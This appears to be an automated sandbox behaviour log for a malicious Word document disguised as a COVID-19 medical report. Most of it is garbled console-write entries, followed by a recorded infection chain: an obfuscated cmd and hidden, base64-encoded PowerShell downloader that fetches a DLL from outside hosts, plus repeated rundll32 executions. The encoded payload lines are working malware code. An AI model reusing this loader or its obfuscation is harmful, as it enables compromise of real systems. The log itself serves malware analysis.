Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....O...............}..j....`Kj...............u.............}..v.....%......0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....O..................j.....&................u.............}..v.... '......0................Hj.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....[.......e.s. .a.r.e. .".S.s.l.3.,. .T.l.s."...".........}..v....8+......0................Hj.....(.......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....[..................j.....+................u.............}..v....p,......0................Hj.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....g.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.5.4.............}..v.....0......0................Hj.....$.......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....g..................j....81................u.............}..v.....1......0................Hj.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....s...............}..j....`Kj...............u.............}..v.....8......0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....s..................j....89................u.............}..v.....9......0................Hj.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................}..j....`Kj...............u.............}..v.....@......0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....8A................u.............}..v.....A......0................Hj.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................}..j....`Kj...............u.............}..v.....H......0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....8I................u.............}..v.....I......0................Hj.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................}..j....`Kj...............u.............}..v.....P......0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....8Q................u.............}..v.....Q......0................Hj.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................}..j....`Kj...............u.............}..v.....X......0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....8Y................u.............}..v.....Y......0................Hj.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................}..j....`Kj...............u.............}..v.....`......0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....8a................u.............}..v.....a......0................Hj.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................}..j....`Kj...............u.............}..v.....h......0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....8i................u.............}..v.....i......0................Hj.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................}..j....`Kj...............u.............}..v.....p......0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....8q................u.............}..v.....q......0................Hj.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................}..j....`Kj...............u.............}..v.....x......0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....8y................u.............}..v.....y......0................Hj.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................}..j....`Kj...............u.............}..v............0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....8.................u.............}..v............0................Hj.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................}..j....`Kj...............u.............}..v............0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....8.................u.............}..v............0................Hj.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................}..j....`Kj...............u.............}..v............0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....8.................u.............}..v............0................Hj.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................}..j....`Kj...............u.............}..v............0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....8.................u.............}..v............0................Hj.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................}..j....`Kj...............u.............}..v............0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....8.................u.............}..v............0................Hj.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................}..j....`Kj...............u.............}..v............0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....8.................u.............}..v............0................Hj.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....'...............}..j....`Kj...............u.............}..v............0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....'..................j....8.................u.............}..v............0................Hj.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....3...............}..j....`Kj...............u.............}..v............0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....3..................j....8.................u.............}..v............0................Hj.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....?...............}..j....`Kj...............u.............}..v............0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....?..................j....8.................u.............}..v............0................Hj.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....K...............}..j....`Kj...............u.............}..v............0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....K..................j....8.................u.............}..v............0................Hj.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....W...............}..j....`Kj...............u.............}..v............0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....W..................j....8.................u.............}..v............0................Hj.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....c...............}..j....`Kj...............u.............}..v............0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....c..................j....8.................u.............}..v............0................Hj.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....o...............}..j....`Kj...............u.............}..v............0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....o..................j....8.................u.............}..v............0................Hj.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....{...............}..j....`Kj...............u.............}..v............0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....{..................j....8.................u.............}..v............0................Hj.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................}..j....`Kj...............u.............}..v............0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....8.................u.............}..v............0................Hj.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................}..j....`Kj...............u.............}..v............0.......................l.......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................u.............}..v....0.......0................Hj.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................}..j....`Kj...............u.............}..v............0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................u.............}..v............0................Hj.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................}..j....`Kj...............u.............}..v....`.......0.......................r.......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................u.............}..v............0................Hj.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............ .......}..j....`Kj...............u.............}..v....(.......0................Hj.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................u.............}..v....`.......0................Hj.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....(................u.............}..v.....^......0...............x.j.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....(................u.............}..v....H.......0...............x.j.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\msg.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kjl48kr\Nqm9ty9\S93E.dll ShowDialogA
Source: XP-9743 Medical report COVID-19.docVirustotal: Detection: 19%
Source: XP-9743 Medical report COVID-19.docReversingLabs: Detection: 13%
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgACQAOABaAEcAIAAgAD0AIABbAHQAWQBwAGUAXQAoACIAewAyAH0AewA1AH0AewAwAH0AewAxAH0AewAzAH0AewA0AH0AIgAtAGYAIAAnAFQARQAnACwAJwBtAC4AJwAsACcAUwB5ACcALAAnAGkAbwAnACwAJwAuAEQASQByAEUAQwB0AE8AUgBZACcALAAnAFMAJwApADsAIAAgACAAJABEADAAQwBxACAAPQAgAFsAVABZAHAAZQBdACgAIgB7ADIAfQB7ADEAfQB7ADAAfQB7ADMAfQB7ADQAfQAiACAALQBmACcAcwBFAHIAdgBJAEMARQBQAG8AJwAsACcAVABlAG0ALgBuAEUAdAAuACcALAAnAFMAWQBzACcALAAnAGkATgB0AG0AYQAnACwAJwBuAEEARwBFAFIAJwApACAAOwAgACQASgBiAHoAMwB5AGEAYQA9ACQARAA1ADMARQAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAUgA3ADYAUAA7ACQARwA3ADMATwA9ACgAJwBGACcAKwAoACcAMAAnACsAJwA0AFYAJwApACkAOwAgACAAKAAgACAARwBlAHQALQBWAGEAcgBJAEEAQgBsAGUAIAAoACIAOABaACIAKwAiAGcAIgApACAAIAAtAHYAQQBsAFUAZQBPAE4AIAApADoAOgAiAGMAcgBFAGAAQQBgAFQAZQBEAGkAUgBgAGUAQwB0AGAAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB0AEsAJwArACgAJwBMACcAKwAnAEsAJwArACcAagBsADQAOABrAHIAJwApACsAJwB0ACcAKwAoACcASwBMAE4AcQAnACsAJwBtADkAJwApACsAKAAnAHQAJwArACcAeQA5ACcAKQArACcAdAAnACsAJwBLAEwAJwApAC0AcgBlAHAAbABBAGMAZQAgACAAKAAnAHQASwAnACsAJwBMACcAKQAsAFsAQwBIAEEAcgBdADkAMgApACkAOwAkAFAANAAzAFcAPQAoACgAJwBVAF8AJwArACcAMgAnACkAKwAnAFAAJwApADsAIAAgACgAIAAgAGMAaABJAEwAZABpAFQAZQBNACAAVgBhAHIASQBBAEIAbABFADoAZAAwAGMAcQAgACAAKQAuAHYAYQBMAHUAZQA6ADoAIgBzAGAAZQBjAFUAUgBJAHQAYABZAHAAUgBPAHQAYABPAEMAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAMQAnACkAKwAnADIAJwApADsAJABTADgAMgBHAD0AKAAoACcARwA5ACcAKwAnADAAJwApACsAJwBNACcAKQA7ACQARAA2AHQAcgB3ADAAMgAgAD0AIAAoACgAJwBTADkAJwArACcAMwAnACkAKwAnAEUAJwApADsAJABYADYAXwBNAD0AKAAnAEQAMwAnACsAJwAwAFAAJwApADsAJABHADYAYQBqAHYAOABkAD0AJABIAE8ATQBFACsAKAAoACcAewAwACcAKwAnAH0ASwBqAGwANAA4AGsAcgAnACsAJwB7ADAAfQBOAHEAJwArACgAJwBtADkAdAB5ACcAKwAnADkAJwApACsAJwB7ADAAfQAnACkALQBmACAAIABbAEMASABhAHIAXQA5ADIAKQArACQARAA2AHQAcgB3ADAAMgArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFYAMwA1AFUAPQAoACgAJwBTADUAJwArACcAXwAnACkAKwAnAFUAJwApADsAJABKAGkAdABvAGEAMgBlAD0AKAAoACcAdwBdAHgAbQBbAHYAcwAnACsAJwA6AC8ALwByAGUAbQBlAGQAJwArACcAaQBpACcAKwAnAHMALgAnACsAJwBjACcAKwAnAG8AJwArACcAbQAvAHQALwBnAG0AMgBYAC8AQAAnACsAJwB3ACcAKQArACgAJwBdAHgAJwArACcAbQBbAHYAOgAnACsAJwAvAC8AYQB2AGEAJwApACsAKAAnAGQAbgAnACsAJwBhAG4AJwApACsAKAAnAHMAYQAnACsAJwBoACcAKQArACcAaQBuACcAKwAoACcALgBjACcAKwAnAG8AbQAnACkAKwAoACcALwAnACsAJwB3AHAAJwArACcALQBpAG4AYwAnACkAKwAnAGwAdQAnACsAKAAnAGQAZQAnACsAJwBzAC8AdwAvAEAAJwApACsAJwB3ACcAKwAnAF0AJwArACgAJwB4ACcAKwAnAG0AWwAnACkAKwAoACcAdgA6AC8ALwAnACsAJwBzAG8AbAAnACsAJwBpAGMAbwAnACkAKwAnAG4AJwArACgAJwAuAHUAcwAnACsAJwAvAGEAbABsAGEAJwArACcAbQAnACsAJwAtAGMAeQAnACkAKwAoACcAYwBsAGUAJwArACcALQAxAGMANAAnACkAKwAoACcAZwBuACcAKwAnAC8AZgA1ACcAKQArACcAegAvACcAKwAoACcAQAAnACsAJwB3AF0AJwApACsAKAAnAHgAJwArACcAbQBbACcAKwAnAHYAOgAvACcAKwAnAC8AdwB3AHcALgByAGkAcABhAHIAYQB6AGkAJwArACcAbwBuACcAKwAnAGkAJwArACcALQAnACkAKwAoACcAcgBhAGQAaQAnACsAJwBvACcAKQArACcAdAB2ACcAKwAnAC4AYwAnACsAKAAnAG8AbQAnACsAJwAvAHMAbwAnACkAKwAnAGYAdAAnACsAKAAnAGEAYwAnACsA
Source: unknownProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgACQAOABaAEcAIAAgAD0AIABbAHQAWQBwAGUAXQAoACIAewAyAH0AewA1AH0AewAwAH0AewAxAH0AewAzAH0AewA0AH0AIgAtAGYAIAAnAFQARQAnACwAJwBtAC4AJwAsACcAUwB5ACcALAAnAGkAbwAnACwAJwAuAEQASQByAEUAQwB0AE8AUgBZACcALAAnAFMAJwApADsAIAAgACAAJABEADAAQwBxACAAPQAgAFsAVABZAHAAZQBdACgAIgB7ADIAfQB7ADEAfQB7ADAAfQB7ADMAfQB7ADQAfQAiACAALQBmACcAcwBFAHIAdgBJAEMARQBQAG8AJwAsACcAVABlAG0ALgBuAEUAdAAuACcALAAnAFMAWQBzACcALAAnAGkATgB0AG0AYQAnACwAJwBuAEEARwBFAFIAJwApACAAOwAgACQASgBiAHoAMwB5AGEAYQA9ACQARAA1ADMARQAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAUgA3ADYAUAA7ACQARwA3ADMATwA9ACgAJwBGACcAKwAoACcAMAAnACsAJwA0AFYAJwApACkAOwAgACAAKAAgACAARwBlAHQALQBWAGEAcgBJAEEAQgBsAGUAIAAoACIAOABaACIAKwAiAGcAIgApACAAIAAtAHYAQQBsAFUAZQBPAE4AIAApADoAOgAiAGMAcgBFAGAAQQBgAFQAZQBEAGkAUgBgAGUAQwB0AGAAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB0AEsAJwArACgAJwBMACcAKwAnAEsAJwArACcAagBsADQAOABrAHIAJwApACsAJwB0ACcAKwAoACcASwBMAE4AcQAnACsAJwBtADkAJwApACsAKAAnAHQAJwArACcAeQA5ACcAKQArACcAdAAnACsAJwBLAEwAJwApAC0AcgBlAHAAbABBAGMAZQAgACAAKAAnAHQASwAnACsAJwBMACcAKQAsAFsAQwBIAEEAcgBdADkAMgApACkAOwAkAFAANAAzAFcAPQAoACgAJwBVAF8AJwArACcAMgAnACkAKwAnAFAAJwApADsAIAAgACgAIAAgAGMAaABJAEwAZABpAFQAZQBNACAAVgBhAHIASQBBAEIAbABFADoAZAAwAGMAcQAgACAAKQAuAHYAYQBMAHUAZQA6ADoAIgBzAGAAZQBjAFUAUgBJAHQAYABZAHAAUgBPAHQAYABPAEMAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAMQAnACkAKwAnADIAJwApADsAJABTADgAMgBHAD0AKAAoACcARwA5ACcAKwAnADAAJwApACsAJwBNACcAKQA7ACQARAA2AHQAcgB3ADAAMgAgAD0AIAAoACgAJwBTADkAJwArACcAMwAnACkAKwAnAEUAJwApADsAJABYADYAXwBNAD0AKAAnAEQAMwAnACsAJwAwAFAAJwApADsAJABHADYAYQBqAHYAOABkAD0AJABIAE8ATQBFACsAKAAoACcAewAwACcAKwAnAH0ASwBqAGwANAA4AGsAcgAnACsAJwB7ADAAfQBOAHEAJwArACgAJwBtADkAdAB5ACcAKwAnADkAJwApACsAJwB7ADAAfQAnACkALQBmACAAIABbAEMASABhAHIAXQA5ADIAKQArACQARAA2AHQAcgB3ADAAMgArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFYAMwA1AFUAPQAoACgAJwBTADUAJwArACcAXwAnACkAKwAnAFUAJwApADsAJABKAGkAdABvAGEAMgBlAD0AKAAoACcAdwBdAHgAbQBbAHYAcwAnACsAJwA6AC8ALwByAGUAbQBlAGQAJwArACcAaQBpACcAKwAnAHMALgAnACsAJwBjACcAKwAnAG8AJwArACcAbQAvAHQALwBnAG0AMgBYAC8AQAAnACsAJwB3ACcAKQArACgAJwBdAHgAJwArACcAbQBbAHYAOgAnACsAJwAvAC8AYQB2AGEAJwApACsAKAAnAGQAbgAnACsAJwBhAG4AJwApACsAKAAnAHMAYQAnACsAJwBoACcAKQArACcAaQBuACcAKwAoACcALgBjACcAKwAnAG8AbQAnACkAKwAoACcALwAnACsAJwB3AHAAJwArACcALQBpAG4AYwAnACkAKwAnAGwAdQAnACsAKAAnAGQAZQAnACsAJwBzAC8AdwAvAEAAJwApACsAJwB3ACcAKwAnAF0AJwArACgAJwB4ACcAKwAnAG0AWwAnACkAKwAoACcAdgA6AC8ALwAnACsAJwBzAG8AbAAnACsAJwBpAGMAbwAnACkAKwAnAG4AJwArACgAJwAuAHUAcwAnACsAJwAvAGEAbABsAGEAJwArACcAbQAnACsAJwAtAGMAeQAnACkAKwAoACcAYwBsAGUAJwArACcALQAxAGMANAAnACkAKwAoACcAZwBuACcAKwAnAC8AZgA1ACcAKQArACcAegAvACcAKwAoACcAQAAnACsAJwB3AF0AJwApACsAKAAnAHgAJwArACcAbQBbACcAKwAnAHYAOgAvACcAKwAnAC8AdwB3AHcALgByAGkAcABhAHIAYQB6AGkAJwArACcAbwBuACcAKwAnAGkAJwArACcALQAnACkAKwAoACcAcgBhAGQAaQAnACsAJwBvACcAKQArACcAdAB2ACcAKwAnAC4AYwAnACsAKAAnAG8AbQAnACsAJwAvAHMAbwAnACkAKwAnAGYAdAAnACsAKAAnAGEAYwAnACsAJwB1ACcAKQArACgAJwBsACcAKwAnAG8AdQBzAC8AJwArACcARABaAHoALwAnACkAKwAnAE
Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kjl48kr\Nqm9ty9\S93E.dll ShowDialogA
Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kjl48kr\Nqm9ty9\S93E.dll ShowDialogA
Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Giyrh\pugu.vsm',ShowDialogA
Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ivtnyogqxjx\ctmhexvkrv.xdn',ShowDialogA
Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Pvbzatsazzovzkv\hcdstjffkhswof.tvm',ShowDialogA
Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ipdtn\rmgx.ktd',ShowDialogA
Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wxiibgduobebnp\hfpumnmgeezpt.jsh',ShowDialogA
Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ndsevdxfleyh\dktakeexwon.agz',ShowDialogA
Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fmtjatw\czosow.gcn',ShowDialogA
Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Udumexhq\tqqkqid.sqp',ShowDialogA
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file. Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgACQAOABaAEcAIAAgAD0AIABbAHQAWQBwAGUAXQAoACIAewAyAH0AewA1AH0AewAwAH0AewAxAH0AewAzAH0AewA0AH0AIgAtAGYAIAAnAFQARQAnACwAJwBtAC4AJwAsACcAUwB5ACcALAAnAGkAbwAnACwAJwAuAEQASQByAEUAQwB0AE8AUgBZACcALAAnAFMAJwApADsAIAAgACAAJABEADAAQwBxACAAPQAgAFsAVABZAHAAZQBdACgAIgB7ADIAfQB7ADEAfQB7ADAAfQB7ADMAfQB7ADQAfQAiACAALQBmACcAcwBFAHIAdgBJAEMARQBQAG8AJwAsACcAVABlAG0ALgBuAEUAdAAuACcALAAnAFMAWQBzACcALAAnAGkATgB0AG0AYQAnACwAJwBuAEEARwBFAFIAJwApACAAOwAgACQASgBiAHoAMwB5AGEAYQA9ACQARAA1ADMARQAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAUgA3ADYAUAA7ACQARwA3ADMATwA9ACgAJwBGACcAKwAoACcAMAAnACsAJwA0AFYAJwApACkAOwAgACAAKAAgACAARwBlAHQALQBWAGEAcgBJAEEAQgBsAGUAIAAoACIAOABaACIAKwAiAGcAIgApACAAIAAtAHYAQQBsAFUAZQBPAE4AIAApADoAOgAiAGMAcgBFAGAAQQBgAFQAZQBEAGkAUgBgAGUAQwB0AGAAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB0AEsAJwArACgAJwBMACcAKwAnAEsAJwArACcAagBsADQAOABrAHIAJwApACsAJwB0ACcAKwAoACcASwBMAE4AcQAnACsAJwBtADkAJwApACsAKAAnAHQAJwArACcAeQA5ACcAKQArACcAdAAnACsAJwBLAEwAJwApAC0AcgBlAHAAbABBAGMAZQAgACAAKAAnAHQASwAnACsAJwBMACcAKQAsAFsAQwBIAEEAcgBdADkAMgApACkAOwAkAFAANAAzAFcAPQAoACgAJwBVAF8AJwArACcAMgAnACkAKwAnAFAAJwApADsAIAAgACgAIAAgAGMAaABJAEwAZABpAFQAZQBNACAAVgBhAHIASQBBAEIAbABFADoAZAAwAGMAcQAgACAAKQAuAHYAYQBMAHUAZQA6ADoAIgBzAGAAZQBjAFUAUgBJAHQAYABZAHAAUgBPAHQAYABPAEMAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAMQAnACkAKwAnADIAJwApADsAJABTADgAMgBHAD0AKAAoACcARwA5ACcAKwAnADAAJwApACsAJwBNACcAKQA7ACQARAA2AHQAcgB3ADAAMgAgAD0AIAAoACgAJwBTADkAJwArACcAMwAnACkAKwAnAEUAJwApADsAJABYADYAXwBNAD0AKAAnAEQAMwAnACsAJwAwAFAAJwApADsAJABHADYAYQBqAHYAOABkAD0AJABIAE8ATQBFACsAKAAoACcAewAwACcAKwAnAH0ASwBqAGwANAA4AGsAcgAnACsAJwB7ADAAfQBOAHEAJwArACgAJwBtADkAdAB5ACcAKwAnADkAJwApACsAJwB7ADAAfQAnACkALQBmACAAIABbAEMASABhAHIAXQA5ADIAKQArACQARAA2AHQAcgB3ADAAMgArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFYAMwA1AFUAPQAoACgAJwBTADUAJwArACcAXwAnACkAKwAnAFUAJwApADsAJABKAGkAdABvAGEAMgBlAD0AKAAoACcAdwBdAHgAbQBbAHYAcwAnACsAJwA6AC8ALwByAGUAbQBlAGQAJwArACcAaQBpACcAKwAnAHMALgAnACsAJwBjACcAKwAnAG8AJwArACcAbQAvAHQALwBnAG0AMgBYAC8AQAAnACsAJwB3ACcAKQArACgAJwBdAHgAJwArACcAbQBbAHYAOgAnACsAJwAvAC8AYQB2AGEAJwApACsAKAAnAGQAbgAnACsAJwBhAG4AJwApACsAKAAnAHMAYQAnACsAJwBoACcAKQArACcAaQBuACcAKwAoACcALgBjACcAKwAnAG8AbQAnACkAKwAoACcALwAnACsAJwB3AHAAJwArACcALQBpAG4AYwAnACkAKwAnAGwAdQAnACsAKAAnAGQAZQAnACsAJwBzAC8AdwAvAEAAJwApACsAJwB3ACcAKwAnAF0AJwArACgAJwB4ACcAKwAnAG0AWwAnACkAKwAoACcAdgA6AC8ALwAnACsAJwBzAG8AbAAnACsAJwBpAGMAbwAnACkAKwAnAG4AJwArACgAJwAuAHUAcwAnACsAJwAvAGEAbABsAGEAJwArACcAbQAnACsAJwAtAGMAeQAnACkAKwAoACcAYwBsAGUAJwArACcALQAxAGMANAAnACkAKwAoACcAZwBuACcAKwAnAC8AZgA1ACcAKQArACcAegAvACcAKwAoACcAQAAnACsAJwB3AF0AJwApACsAKAAnAHgAJwArACcAbQBbACcAKwAnAHYAOgAvACcAKwAnAC8AdwB3AHcALgByAGkAcABhAHIAYQB6AGkAJwArACcAbwBuACcAKwAnAGkAJwArACcALQAnACkAKwAoACcAcgBhAGQAaQAnACsAJwBvACcAKQArACcAdAB2ACcAKwAnAC4AYwAnACsAKAAnAG8AbQAnACsAJwAvAH